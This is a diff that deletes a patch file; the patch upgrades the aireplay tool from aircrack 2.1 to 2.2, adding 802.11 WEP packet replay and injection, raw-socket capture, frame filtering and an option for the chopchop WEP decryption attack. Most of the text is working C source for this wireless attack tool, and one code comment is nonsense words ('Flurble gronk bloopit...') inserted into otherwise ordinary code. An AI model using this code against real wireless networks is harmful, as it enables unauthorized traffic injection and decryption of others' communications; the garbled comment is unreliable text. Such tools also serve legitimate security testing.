+++ /dev/null
-diff -urN aircrack-2.1.orig/aireplay.c aircrack-2.1/aireplay.c
---- aircrack-2.1.orig/aireplay.c 2004-10-01 21:30:00.000000000 +0200
-+++ aircrack-2.1/aireplay.c 2005-04-22 08:51:21.932065120 +0200
-@@ -1,7 +1,9 @@
- /*
-- * 802.11 WEP arp-requests replay attack
-+ * 802.11 WEP replay & injection attacks
- *
-- * Copyright (C) 2004 Christophe Devine
-+ * Copyright (C) 2004,2005 Christophe Devine
-+ *
-+ * WEP decryption attack (chopchop) developped by KoreK
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
-@@ -18,41 +20,105 @@
- * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
- */
-
-+#include <sys/types.h>
- #include <netpacket/packet.h>
-+#include <linux/rtc.h>
- #include <sys/ioctl.h>
-+#include <sys/wait.h>
-+#include <sys/stat.h>
- #include <arpa/inet.h>
-+#include <pthread.h>
- #include <net/if.h>
- #include <unistd.h>
- #include <signal.h>
- #include <string.h>
- #include <stdlib.h>
- #include <stdio.h>
-+#include <fcntl.h>
-+#include <errno.h>
- #include <time.h>
-
--#include "pcap.h"
-+#include "pcap-aireplay.h"
-+#include "crctable.h"
-+
-+#define NULL_MAC "\x00\x00\x00\x00\x00\x00"
-
- #ifndef ETH_P_ALL
- #define ETH_P_ALL 3
- #endif
-
--#define BROADCAST_ADDR "\xFF\xFF\xFF\xFF\xFF\xFF"
-+#ifndef ETH_P_80211_RAW
-+#define ETH_P_80211_RAW 25
-+#endif
-+
-+#ifndef ARPHRD_IEEE80211
-+#define ARPHRD_IEEE80211 801
-+#endif
-+
-+#ifndef ARPHRD_IEEE80211_PRISM
-+#define ARPHRD_IEEE80211_PRISM 802
-+#endif
-
- char usage[] =
-
- "\n"
--" aireplay 2.1 - (C) 2004 Christophe Devine\n"
-+" aireplay 2.2 - (C) 2004,2005 Christophe Devine\n"
-+"\n"
-+" usage: aireplay [options] <interface #0> [interface #1]\n"
- "\n"
--" usage: aireplay <wifi interface> <input filename> [bssid]\n"
-+" interface #0 is for sending packets; it is also used to\n"
-+" capture packets unless interface #1 is specified.\n"
-+"\n"
-+" source options:\n"
-+"\n"
-+" -i : capture packet on-the-fly (default)\n"
-+" -r file : extract packet from this pcap file\n"
-+"\n"
-+" filter options:\n"
-+"\n"
-+" -b bssid : MAC address, Access Point\n"
-+" -d dmac : MAC address, Destination\n"
-+" -s smac : MAC address, Source\n"
-+" -m len : minimum packet length, default: 40\n"
-+" -n len : maximum packet length, default: 512\n"
-+" -u type : fc, type - default: 2 = data\n"
-+" -v subt : fc, subtype - default: 0 = normal\n"
-+" -t tods : fc, To DS bit - default: any\n"
-+" -f fromds : fc, From DS bit - default: any\n"
-+" -w iswep : fc, WEP bit - default: 1\n"
-+" -y : assume yes & don't save packet\n"
-+"\n"
-+" replay options:\n"
-+"\n"
-+" -x nbpps : number of packets per second\n"
-+" -a bssid : set Access Point MAC address\n"
-+" -c dmac : set Destination MAC address\n"
-+" -h smac : set Source MAC address\n"
-+" -o fc0 : set frame control[0] (hex)\n"
-+" -p fc1 : set frame control[1] (hex)\n"
-+" -k : turn chopchop attack on\n"
- "\n";
-
--unsigned char buffer[65536];
--
--struct __packet
-+struct options
- {
-- unsigned int length;
-- unsigned char *data;
--}
--arp_packets[4096];
-+ unsigned char *s_file;
-+
-+ unsigned char f_bssid[6];
-+ unsigned char f_smac[6];
-+ unsigned char f_dmac[6];
-+ int f_minlen, f_maxlen;
-+ int f_type, f_subtype;
-+ int f_fromds, f_tods, f_iswep;
-+ int assume_yes;
-+
-+ unsigned char r_bssid[6];
-+ unsigned char r_smac[6];
-+ unsigned char r_dmac[6];
-+ int r_fc_0, r_fc_1;
-+ int nbpps, do_chopchop;
-+};
-+
-+char *wlanng_dev = NULL;
-
- int do_exit = 0;
-
-@@ -60,295 +126,1370 @@
- {
- if( signum == SIGINT || signum == SIGTERM )
- do_exit = 1;
-+
-+ if( signum == SIGALRM )
-+ do_exit = 2;
- }
-
--int main( int argc, char *argv[] )
-+/* CRC checksum verification routine */
-+
-+int check_crc_buf( unsigned char *buf, int len )
- {
-- FILE *f_cap;
-+ unsigned long crc = 0xFFFFFFFF;
-
-- char *s;
-- int bssid_set;
-- long cnt1, cnt2;
-- int i, n, raw_sock;
-- unsigned char *h80211;
-- unsigned char bssid[6];
-+ for( ; len > 0; len--, buf++ )
-+ crc = crc_tbl[(crc ^ *buf) & 0xFF] ^ ( crc >> 8 );
-+
-+ return( ~crc == *((unsigned long *) buf) );
-+}
-+
-+/* MAC address parsing routine */
-+
-+int getmac( char *s, unsigned char *mac )
-+{
-+ int i = 0, n;
-+
-+ while( sscanf( s, "%x", &n ) == 1 )
-+ {
-+ if( n < 0 || n > 255 )
-+ return( 1 );
-+
-+ mac[i] = n;
-
-+ if( ++i == 6 ) break;
-+
-+ if( ! ( s = strchr( s, ':' ) ) )
-+ break;
-+
-+ s++;
-+ }
-+
-+ return( i != 6 );
-+}
-+
-+/* interface initialization routine */
-+
-+int openraw( char *iface, int fd, int *arptype )
-+{
- struct ifreq ifr;
-+ struct packet_mreq mr;
- struct sockaddr_ll sll;
-- struct pcap_file_header pfh;
-- struct pcap_pkthdr pkh;
-- time_t tm_prev;
-+
-+ /* find the interface index */
-
-- /* create the raw socket */
-+ memset( &ifr, 0, sizeof( ifr ) );
-+ strncpy( ifr.ifr_name, iface, sizeof( ifr.ifr_name ) - 1 );
-
-- if( ( raw_sock = socket( PF_PACKET, SOCK_RAW,
-- htons( ETH_P_ALL ) ) ) < 0 )
-+ if( ioctl( fd, SIOCGIFINDEX, &ifr ) < 0 )
- {
-- perror( "socket(PF_PACKET)" );
-+ perror( "ioctl(SIOCGIFINDEX)" );
- return( 1 );
- }
-
-- /* drop privileges */
-+ /* bind the raw socket to the interface */
-
-- setuid( getuid() );
-+ memset( &sll, 0, sizeof( sll ) );
-+ sll.sll_family = AF_PACKET;
-+ sll.sll_ifindex = ifr.ifr_ifindex;
-+ if( wlanng_dev )
-+ sll.sll_protocol = htons( ETH_P_80211_RAW );
-+ else
-+ sll.sll_protocol = htons( ETH_P_ALL );
-
-- /* check the arguments */
-+ if( bind( fd, (struct sockaddr *) &sll,
-+ sizeof( sll ) ) < 0 )
-+ {
-+ perror( "bind(ETH_P_ALL)" );
-+ return( 1 );
-+ }
-+
-+ /* lookup the hardware type */
-
-- if( argc < 3 || argc > 4 )
-+ if( ioctl( fd, SIOCGIFHWADDR, &ifr ) < 0 )
- {
-- usage:
-- printf( usage );
-+ perror( "ioctl(SIOCGIFHWADDR)" );
- return( 1 );
- }
-
-- bssid_set = 0;
-+ if( ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211 &&
-+ ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211_PRISM )
-+ {
-+ fprintf( stderr, "unsupported hardware link type %d\n"
-+ "(expected ARPHRD_IEEE80211{,PRISM})\n",
-+ ifr.ifr_hwaddr.sa_family );
-+ fprintf( stderr, "make sure the interface is in Monitor mode\n" );
-+ return( 1 );
-+ }
-+
-+ *arptype = ifr.ifr_hwaddr.sa_family;
-+
-+ /* enable promiscuous mode */
-
-- if( argc == 4 )
-+ memset( &mr, 0, sizeof( mr ) );
-+ mr.mr_ifindex = sll.sll_ifindex;
-+ mr.mr_type = PACKET_MR_PROMISC;
-+
-+ if( setsockopt( fd, SOL_PACKET, PACKET_ADD_MEMBERSHIP,
-+ &mr, sizeof( mr ) ) < 0 )
- {
-- i = 0;
-- s = optarg;
-+ perror( "setsockopt(PACKET_MR_PROMISC)" );
-+ return( 1 );
-+ }
-
-- while( sscanf( s, "%x", &n ) == 1 )
-- {
-- if( n < 0 || n > 255 )
-- goto usage;
-+ return( 0 );
-+}
-+
-+/* wlanng-aware frame sending routing */
-+
-+unsigned char tmpbuf[4096];
-
-- bssid[i] = n;
-+int send_frame( int fd, void *buf, size_t count )
-+{
-+ if( wlanng_dev )
-+ {
-+ if( ( ((unsigned char *) buf)[0] & 3 ) != 3 )
-+ {
-+ memcpy( tmpbuf, buf, 24 );
-+ memset( tmpbuf + 24, 0, 22 );
-
-- if( ++i == 6 ) break;
-+ tmpbuf[30] = ( count - 24 ) & 0xFF;
-+ tmpbuf[31] = ( count - 24 ) >> 8;
-
-- if( ! ( s = strchr( s, ':' ) ) )
-- break;
-+ memcpy( tmpbuf + 46, buf + 24, count - 24 );
-
-- s++;
-+ count += 22;
- }
-+ else
-+ {
-+ memcpy( tmpbuf, buf, 30 );
-+ memset( tmpbuf + 30, 0, 16 );
-+
-+ tmpbuf[30] = ( count - 30 ) & 0xFF;
-+ tmpbuf[31] = ( count - 30 ) >> 8;
-
-- if( i != 6 ) goto usage;
-+ memcpy( tmpbuf + 46, buf + 30, count - 30 );
-+
-+ count += 16;
-+ }
-
-- bssid_set = 1;
-+ buf = tmpbuf;
- }
-
-- if( argc - optind != 2 )
-- goto usage;
-+ return( write( fd, buf, count ) < 0 );
-+}
-+
-+int main( int argc, char *argv[] )
-+{
-+ time_t tt;
-+ int i, j, n, z;
-+ int fd_rtc, caplen;
-+ int fd_in, arptype_in;
-+ int fd_out, arptype_out;
-+ int i_bssid, i_smac, i_dmac;
-+ int data_start, data_end;
-+ int guess, is_deauth_mode;
-+
-+ unsigned long ticks[4];
-+ unsigned long crc_mask;
-+ unsigned long nb_pkt_read;
-+ unsigned long nb_pkt_sent;
-+
-+ char tmp_str[256];
-+
-+ unsigned char buffer[4096];
-+ unsigned char *h80211;
-+ unsigned char *savebuf;
-+ unsigned char *chopped;
-+
-+ FILE *f_cap_in = NULL;
-+ FILE *f_cap_out = NULL;
-+
-+ struct tm *lt;
-+ struct timeval tv;
-+ struct options opt;
-+ struct pcap_file_header pfh;
-+ struct pcap_pkthdr pkh;
-
-- if( strcmp( argv[optind], "wlan0ap" ) &&
-- strcmp( argv[optind], "wlan1ap" ) &&
-- strcmp( argv[optind], "wlan2ap" ) )
-+ fd_set rfds;
-+
-+ /* create i/o raw sockets and open /dev/rtc */
-+
-+ if( ( fd_in = socket( PF_PACKET, SOCK_RAW,
-+ htons( ETH_P_ALL ) ) ) < 0 )
- {
-- fprintf( stderr, "This program only works with HostAP's "
-- "wlan#ap interface.\n" );
-+ perror( "socket(PF_PACKET)" );
- return( 1 );
- }
-
-- /* open the input file and check the pcap header */
--
-- if( ( f_cap = fopen( argv[optind + 1], "rb" ) ) == NULL )
-+ if( ( fd_out = socket( PF_PACKET, SOCK_RAW,
-+ htons( ETH_P_ALL ) ) ) < 0 )
- {
-- perror( "open" );
-+ perror( "socket(PF_PACKET)" );
- return( 1 );
- }
-
-- n = sizeof( struct pcap_file_header );
--
-- if( fread( &pfh, 1, n, f_cap ) != (size_t) n )
-+ if( ( fd_rtc = open( "/dev/rtc", O_RDONLY ) ) < 0 )
- {
-- perror( "read(pcap header)" );
-+ perror( "open(/dev/rtc)" );
- return( 1 );
- }
-
-- if( pfh.magic != TCPDUMP_MAGIC )
-+ if( ioctl( fd_rtc, RTC_IRQP_SET, 4096 ) < 0 )
- {
-- fprintf( stderr, "wrong magic from pcap file header\n"
-- "(got 0x%08X, expected 0x%08X)\n",
-- pfh.magic, TCPDUMP_MAGIC );
-+ perror( "ioctl(RTC_IRQP_SET)" );
-+ printf( "Make sure you have enhanced rtc support in your kernel\n"
-+ "(module rtc) and that CONFIG_HPET_RTC_IRQ is disabled.\n" );
- return( 1 );
- }
-
-- if( pfh.linktype != LINKTYPE_IEEE802_11 &&
-- pfh.linktype != LINKTYPE_PRISM_HEADER )
-+ if( ioctl( fd_rtc, RTC_PIE_ON, 0 ) < 0 )
- {
-- fprintf( stderr, "unsupported pcap header linktype %d\n",
-- pfh.linktype );
-+ perror( "ioctl(RTC_PIE_ON)" );
- return( 1 );
- }
-
-- /* find the interface index */
-+ /* drop privileges */
-
-- memset( &ifr, 0, sizeof( ifr ) );
-- strncpy( ifr.ifr_name, argv[optind], sizeof( ifr.ifr_name ) - 1 );
-+ setuid( getuid() );
-+
-+ /* check the arguments */
-+
-+ memset( &opt, 0, sizeof( opt ) );
-+
-+ opt.f_minlen = 40;
-+ opt.f_maxlen = 512;
-+ opt.f_type = 2;
-+ opt.f_subtype = 0;
-+ opt.f_tods = -1;
-+ opt.f_fromds = -1;
-+ opt.f_iswep = 1;
-+ opt.r_fc_0 = -1;
-+ opt.r_fc_1 = -1;
-
-- if( ioctl( raw_sock, SIOCGIFINDEX, &ifr ) < 0 )
-+ while( 1 )
- {
-- perror( "ioctl(SIOCGIFINDEX)" );
-- return( 1 );
-+ int option = getopt( argc, argv,
-+ "ir:b:d:s:m:n:u:v:t:f:w:yx:a:c:h:o:p:k" );
-+
-+ if( option < 0 ) break;
-+
-+ switch( option )
-+ {
-+ case 'i' : break;
-+
-+ case 'r' : if( opt.s_file != NULL )
-+ {
-+ printf( "Packet source file already specified.\n" );
-+ return( 1 );
-+ }
-+ opt.s_file = optarg;
-+ break;
-+
-+ case 'b' : if( getmac( optarg, opt.f_bssid ) != 0 )
-+ {
-+ printf( "Invalid AP MAC address.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'd' : if( getmac( optarg, opt.f_dmac ) != 0 )
-+ {
-+ printf( "Invalid destination MAC address.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 's' : if( getmac( optarg, opt.f_smac ) != 0 )
-+ {
-+ printf( "Invalid source MAC address.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'm' : sscanf( optarg, "%d", &opt.f_minlen );
-+ if( opt.f_minlen < 0 )
-+ {
-+ printf( "Invalid minimum length filter.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'n' : sscanf( optarg, "%d", &opt.f_maxlen );
-+ if( opt.f_maxlen < 0 )
-+ {
-+ printf( "Invalid maximum length filter.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'u' : sscanf( optarg, "%d", &opt.f_type );
-+ if( opt.f_type < 0 || opt.f_type > 3 )
-+ {
-+ printf( "Invalid type filter.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'v' : sscanf( optarg, "%d", &opt.f_subtype );
-+ if( opt.f_subtype < 0 || opt.f_subtype > 15 )
-+ {
-+ printf( "Invalid subtype filter.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 't' : sscanf( optarg, "%d", &opt.f_tods );
-+ if( opt.f_tods != 0 && opt.f_tods != 1 )
-+ {
-+ printf( "Invalid tods filter.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'f' : sscanf( optarg, "%d", &opt.f_fromds );
-+ if( opt.f_fromds != 0 && opt.f_fromds != 1 )
-+ {
-+ printf( "Invalid fromds filter.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'w' : sscanf( optarg, "%d", &opt.f_iswep );
-+ if( opt.f_iswep != 0 && opt.f_iswep != 1 )
-+ {
-+ printf( "Invalid wep filter.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'y' : opt.assume_yes = 1; break;
-+
-+ case 'x' : sscanf( optarg, "%d", &opt.nbpps );
-+ if( opt.nbpps < 1 || opt.nbpps > 4096 )
-+ {
-+ printf( "Invalid number of packets per second.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'a' : if( getmac( optarg, opt.r_bssid ) != 0 )
-+ {
-+ printf( "Invalid AP MAC address.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'c' : if( getmac( optarg, opt.r_dmac ) != 0 )
-+ {
-+ printf( "Invalid destination MAC address.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'h' : if( getmac( optarg, opt.r_smac ) != 0 )
-+ {
-+ printf( "Invalid source MAC address.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'o' : sscanf( optarg, "%x", &opt.r_fc_0 );
-+ if( opt.r_fc_0 < 0 || opt.r_fc_0 > 255 )
-+ {
-+ printf( "Invalid frame control byte #0.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'p' : sscanf( optarg, "%x", &opt.r_fc_1 );
-+ if( opt.r_fc_1 < 0 || opt.r_fc_1 > 255 )
-+ {
-+ printf( "Invalid frame control byte #1.\n" );
-+ return( 1 );
-+ }
-+ break;
-+
-+ case 'k' : opt.do_chopchop = 1; break;
-+
-+ default : goto usage; break;
-+ }
- }
-
-- /* bind the raw socket to the interface */
-+ if( argc - optind < 1 || argc - optind > 2 )
-+ {
-+ usage:
-+ printf( usage );
-+ return( 1 );
-+ }
-
-- memset( &sll, 0, sizeof( sll ) );
-- sll.sll_family = AF_PACKET;
-- sll.sll_ifindex = ifr.ifr_ifindex;
-- sll.sll_protocol = htons( ETH_P_ALL );
-+ if( opt.f_minlen > opt.f_maxlen )
-+ {
-+ printf( "Invalid length filter (%d > %d).\n",
-+ opt.f_minlen, opt.f_maxlen );
-+ return( 1 );
-+ }
-
-- if( bind( raw_sock, (struct sockaddr *) &sll,
-- sizeof( sll ) ) < 0 )
-+ if( opt.nbpps == 0 )
- {
-- perror( "bind(ETH_P_ALL)" );
-+ opt.nbpps = 256;
-+ printf( "Option -x not specified, assuming %d.\n",
-+ opt.nbpps );
-+ }
-+
-+ if( memcmp( argv[optind], "wlan", 4 ) == 0 )
-+ wlanng_dev = argv[optind];
-+
-+ if( openraw( argv[optind], fd_out, &arptype_out ) != 0 )
- return( 1 );
-+
-+ /* open the packet source */
-+
-+ if( argc - optind == 2 )
-+ {
-+ if( openraw( argv[argc - 1], fd_in, &arptype_in ) != 0 )
-+ return( 1 );
-+ }
-+ else
-+ {
-+ fd_in = fd_out;
-+ arptype_in = arptype_out;
-+ }
-+
-+ if( opt.s_file != NULL )
-+ {
-+ if( ! ( f_cap_in = fopen( opt.s_file, "rb" ) ) )
-+ {
-+ perror( "open" );
-+ return( 1 );
-+ }
-+
-+ n = sizeof( struct pcap_file_header );
-+
-+ if( fread( &pfh, 1, n, f_cap_in ) != (size_t) n )
-+ {
-+ perror( "fread(pcap file header)" );
-+ return( 1 );
-+ }
-+
-+ if( pfh.magic != TCPDUMP_MAGIC &&
-+ pfh.magic != TCPDUMP_CIGAM )
-+ {
-+ fprintf( stderr, "wrong magic from pcap file header\n" );
-+ return( 1 );
-+ }
-+
-+ if( pfh.magic == TCPDUMP_CIGAM )
-+ SWAP32(pfh.linktype);
-+
-+ if( pfh.linktype != LINKTYPE_IEEE802_11 &&
-+ pfh.linktype != LINKTYPE_PRISM_HEADER )
-+ {
-+ fprintf( stderr, "'%s' is not a 802.11 capture file.\n",
-+ opt.s_file );
-+ return( 1 );
-+ }
- }
-
-- signal( SIGINT, sighandler );
-+ /* look for replay-able packets */
-
-- tm_prev = time( NULL );
-+ signal( SIGINT, sighandler );
-+ signal( SIGTERM, sighandler );
-
-- cnt1 = cnt2 = 0;
-+ nb_pkt_read = 0;
-
-- /* search for potentially usable packets */
-+ tt = time( NULL );
-
- while( 1 )
- {
-- if( do_exit ) break;
-+ if( do_exit )
-+ {
-+ printf( "exiting.\n" );
-+ return( 1 );
-+ }
-
-- if( time( NULL ) - tm_prev >= 1 )
-+ if( time( NULL ) - tt >= 1 )
- {
-- tm_prev = time( NULL );
-- printf( "\r\33[1KRead %ld packets, got %ld "
-- "potential ARP packets\r", cnt1, cnt2 );
-+ tt = time( NULL );
-+ printf( "\rSeen %ld packets...\33[K", nb_pkt_read );
- fflush( stdout );
- }
-
-- /* read one packet */
-+ caplen = 0;
-
-- n = sizeof( pkh );
-+ if( opt.s_file == NULL )
-+ {
-+ /* capture one packet */
-
-- if( fread( &pkh, 1, n, f_cap ) != (size_t) n )
-- break;
-+ FD_ZERO( &rfds );
-+ FD_SET( fd_in, &rfds );
-
-- if( pkh.len != pkh.caplen )
-- continue;
-+ tv.tv_sec = 1;
-+ tv.tv_usec = 0;
-
-- n = pkh.caplen;
-+ if( select( fd_in + 1, &rfds, NULL, NULL, NULL ) < 0 )
-+ {
-+ if( errno == EINTR ) continue;
-+ perror( "select" );
-+ return( 1 );
-+ }
-
-- if( fread( buffer, 1, n, f_cap ) != (size_t) n )
-- break;
-+ if( ! FD_ISSET( fd_in, &rfds ) )
-+ continue;
-
-- cnt1++;
-+ /* one packet available for reading */
-
-- h80211 = buffer;
-+ gettimeofday( &tv, NULL );
-+
-+ memset( buffer, 0, 2048 );
-
-- if( pfh.linktype == LINKTYPE_PRISM_HEADER )
-+ if( ( caplen = read( fd_in, buffer,
-+ sizeof( buffer ) ) ) < 0 )
-+ {
-+ perror( "read" );
-+ return( 1 );
-+ }
-+
-+ /* if device is an atheros, remove the FCS */
-+
-+ if( memcmp( argv[argc - 1], "ath", 3 ) == 0 )
-+ caplen -= 4;
-+ }
-+ else
- {
-- /* remove the prism header if necessary */
-+ /* read one packet */
-
-- n = *(int *)( h80211 + 4 );
-+ n = sizeof( pkh );
-
-- if( n < 8 || n >= (int) pkh.len )
-+ if( fread( &pkh, 1, n, f_cap_in ) != (size_t) n )
-+ {
-+ printf( "\rSeen %ld packets...EOF.\n",
-+ nb_pkt_read );
-+ return( 1 );
-+ }
-+
-+ if( pfh.magic == TCPDUMP_CIGAM )
-+ SWAP32( pkh.caplen );
-+
-+ n = caplen = pkh.caplen;
-+
-+ if( fread( buffer, 1, n, f_cap_in ) != (size_t) n )
-+ {
-+ printf( "\rSeen %ld packets...EOF.\n",
-+ nb_pkt_read );
-+ return( 1 );
-+ }
-+ }
-+
-+ nb_pkt_read++;
-+
-+ /* skip the prism header if present */
-+
-+ h80211 = buffer;
-+
-+ if( ( opt.s_file == NULL && arptype_in == ARPHRD_IEEE80211_PRISM ) ||
-+ ( opt.s_file != NULL && pfh.linktype == LINKTYPE_PRISM_HEADER ) )
-+ {
-+ n = *(int *)( buffer + 4 );
-+
-+ if( n < 8 || n >= (int) caplen )
- continue;
-
-- h80211 += n; pkh.len -= n;
-+ h80211 += n;
-+ caplen -= n;
- }
-
-- /* check if it's an encrypted data packet */
-+ /* check length */
-+
-+ if( caplen < opt.f_minlen ||
-+ caplen > opt.f_maxlen ) continue;
-
-- if( pkh.len < 40 ) continue;
-+ /* check the frame control bytes */
-
-- if( ( h80211[0] & 0x0C ) != 0x08 ) continue;
-- if( ( h80211[1] & 0x40 ) != 0x40 ) continue;
-+ if( ( h80211[0] & 0x0C ) != ( opt.f_type << 2 ) &&
-+ opt.f_type >= 0 ) continue;
-
-- /* also check the BSSID and KeyID */
-+ if( ( h80211[0] & 0xF0 ) != ( opt.f_subtype << 4 ) &&
-+ opt.f_subtype >= 0 ) continue;
-+
-+ if( ( h80211[1] & 0x01 ) != ( opt.f_tods ) &&
-+ opt.f_tods >= 0 ) continue;
-+
-+ if( ( h80211[1] & 0x02 ) != ( opt.f_fromds << 1 ) &&
-+ opt.f_fromds >= 0 ) continue;
-+
-+ if( ( h80211[1] & 0x40 ) != ( opt.f_iswep << 6 ) &&
-+ opt.f_iswep >= 0 ) continue;
-+
-+ /* check the extended IV (TKIP) flag */
-+
-+ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
-+
-+ if( opt.f_type == 2 && opt.f_iswep == 1 &&
-+ ( h80211[z + 3] & 0x20 ) != 0 ) continue;
-+
-+ /* MAC address checking */
-
- switch( h80211[1] & 3 )
- {
-- case 0: i = 16; break; /* DA, SA, (BSSID) */
-- case 1: i = 4; break; /* (BSSID), SA, DA */
-- case 2: i = 10; break; /* DA, (BSSID), SA */
-- default: i = 4; break; /* (RA), TA, DA, SA */
-+ case 0: i_bssid = 16; i_smac = 10; i_dmac = 4; break;
-+ case 1: i_bssid = 4; i_smac = 10; i_dmac = 16; break;
-+ case 2: i_bssid = 10; i_smac = 16; i_dmac = 4; break;
-+ default: i_bssid = 4; i_dmac = 16; i_smac = 24; break;
- }
-
-- if( bssid_set == 0 )
-+ if( memcmp( opt.f_bssid, NULL_MAC, 6 ) != 0 )
-+ if( memcmp( h80211 + i_bssid, opt.f_bssid, 6 ) != 0 )
-+ continue;
-+
-+ if( memcmp( opt.f_smac, NULL_MAC, 6 ) != 0 )
-+ if( memcmp( h80211 + i_smac, opt.f_smac, 6 ) != 0 )
-+ continue;
-+
-+ if( memcmp( opt.f_dmac, NULL_MAC, 6 ) != 0 )
-+ if( memcmp( h80211 + i_dmac, opt.f_dmac, 6 ) != 0 )
-+ continue;
-+
-+ /* this one looks good */
-+
-+ printf( "\n\n Size: %d, FromDS: %d, ToDS: %d\n",
-+ caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) );
-+ printf( " BSSID = %02X:%02X:%02X:%02X:%02X:%02X\n",
-+ h80211[i_bssid ], h80211[i_bssid + 1],
-+ h80211[i_bssid + 2], h80211[i_bssid + 3],
-+ h80211[i_bssid + 4], h80211[i_bssid + 5] );
-+ printf( " Src. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
-+ h80211[i_smac ], h80211[i_smac + 1],
-+ h80211[i_smac + 2], h80211[i_smac + 3],
-+ h80211[i_smac + 4], h80211[i_smac + 5] );
-+ printf( " Dst. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
-+ h80211[i_dmac ], h80211[i_dmac + 1],
-+ h80211[i_dmac + 2], h80211[i_dmac + 3],
-+ h80211[i_dmac + 4], h80211[i_dmac + 5] );
-+
-+ /* Flurble gronk bloopit, bnip Frundletrune! */
-+
-+ for( i = 0; i < caplen; i++ )
- {
-- bssid_set = 1;
-+ if( ( i & 15 ) == 0 )
-+ {
-+ if( i == 256 )
-+ {
-+ printf( "\n --- CUT ---" );
-+ break;
-+ }
-+
-+ printf( "\n 0x%04x: ", i );
-+ }
-
-- memcpy( bssid, h80211 + i, 6 );
-+ printf( "%02x", h80211[i] );
-+
-+ if( ( i & 1 ) != 0 )
-+ printf( " " );
-+
-+ if( i == caplen - 1 && ( ( i + 1 ) & 15 ) != 0 )
-+ {
-+ for( j = ( ( i + 1 ) & 15 ); j < 16; j++ )
-+ {
-+ printf( " " );
-+ if( ( j & 1 ) != 0 )
-+ printf( " " );
-+ }
-+
-+ printf( " " );
-+
-+ for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ )
-+ printf( "%c", ( h80211[i - 15 + j] < 32 ||
-+ h80211[i - 15 + j] > 126 )
-+ ? '.' : h80211[i - 15 + j] );
-+ }
-
-- printf( "\33[2KChoosing first encrypted BSSID"
-- " = %02X:%02X:%02X:%02X:%02X:%02X\n",
-- bssid[0], bssid[1], bssid[2],
-- bssid[3], bssid[4], bssid[5] );
-+ if( i > 0 && ( ( i + 1 ) & 15 ) == 0 )
-+ {
-+ printf( " " );
-+
-+ for( j = 0; j < 16; j++ )
-+ printf( "%c", ( h80211[i - 15 + j] < 32 ||
-+ h80211[i - 15 + j] > 127 )
-+ ? '.' : h80211[i - 15 + j] );
-+ }
- }
-- else
-- if( memcmp( bssid, h80211 + i, 6 ) )
-- continue;
-
-- /* finally check the packet length & broadcast address */
-+ printf( "\n\n" );
-
-- switch( h80211[1] & 3 )
-+ if( opt.assume_yes )
-+ break;
-+
-+ printf( "Use this packet ? " );
-+
-+ fflush( stdout );
-+ signal( SIGINT, SIG_DFL );
-+ scanf( "%s", tmp_str );
-+ signal( SIGINT, sighandler );
-+ printf( "\n" );
-+
-+ if( tmp_str[0] == 'y' || tmp_str[0] == 'Y' )
-+ break;
-+ }
-+
-+ /* save the selected packet */
-+
-+ pfh.magic = TCPDUMP_MAGIC;
-+ pfh.version_major = PCAP_VERSION_MAJOR;
-+ pfh.version_minor = PCAP_VERSION_MINOR;
-+ pfh.thiszone = 0;
-+ pfh.sigfigs = 0;
-+ pfh.snaplen = 65535;
-+ pfh.linktype = LINKTYPE_IEEE802_11;
-+
-+ pkh.tv_sec = tv.tv_sec;
-+ pkh.tv_usec = tv.tv_usec;
-+ pkh.caplen = caplen;
-+ pkh.len = caplen;
-+
-+ lt = localtime( &tv.tv_sec );
-+
-+ if( ! opt.assume_yes )
-+ {
-+ sprintf( tmp_str, "replay_src-%02d%02d%02d-%02d%02d%02d.cap",
-+ lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
-+ lt->tm_hour, lt->tm_min, lt->tm_sec );
-+
-+ printf( "Saving chosen packet in %s\n\n", tmp_str );
-+
-+ n = sizeof( struct pcap_file_header );
-+
-+ if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
- {
-- case 0: i = 4; break; /* (DA), SA, BSSID */
-- case 1: i = 16; break; /* BSSID, SA, (DA) */
-- case 2: i = 4; break; /* (DA), BSSID, SA */
-- default: i = 16; break; /* RA, TA, (DA), SA */
-+ perror( "fopen(pcap output,wb+)" );
-+ return( 1 );
- }
-
-- if( pkh.len + ( h80211[27] & 0x3F ) != 0x44 ||
-- memcmp( h80211 + i, BROADCAST_ADDR, 6 ) )
-- continue;
-+ if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
-+ {
-+ perror( "fwrite(pcap file header)\n" );
-+ return( 1 );
-+ }
-
-- /* ok, this packet may be replayed */
-+ n = sizeof( pkh );
-
-- arp_packets[cnt2].length = pkh.len;
-+ if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
-+ {
-+ perror( "fwrite(packet header)" );
-+ return( 1 );
-+ }
-
-- arp_packets[cnt2].data = (unsigned char *)
-- malloc( pkh.len );
-+ n = pkh.caplen;
-
-- if( ! arp_packets[cnt2].data )
-+ if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
- {
-- perror( "malloc" );
-+ perror( "fwrite(packet data)" );
- return( 1 );
- }
-+ }
-
-- memcpy( arp_packets[cnt2].data, buffer, pkh.len );
-+ if( opt.do_chopchop ) goto do_chopchop;
-
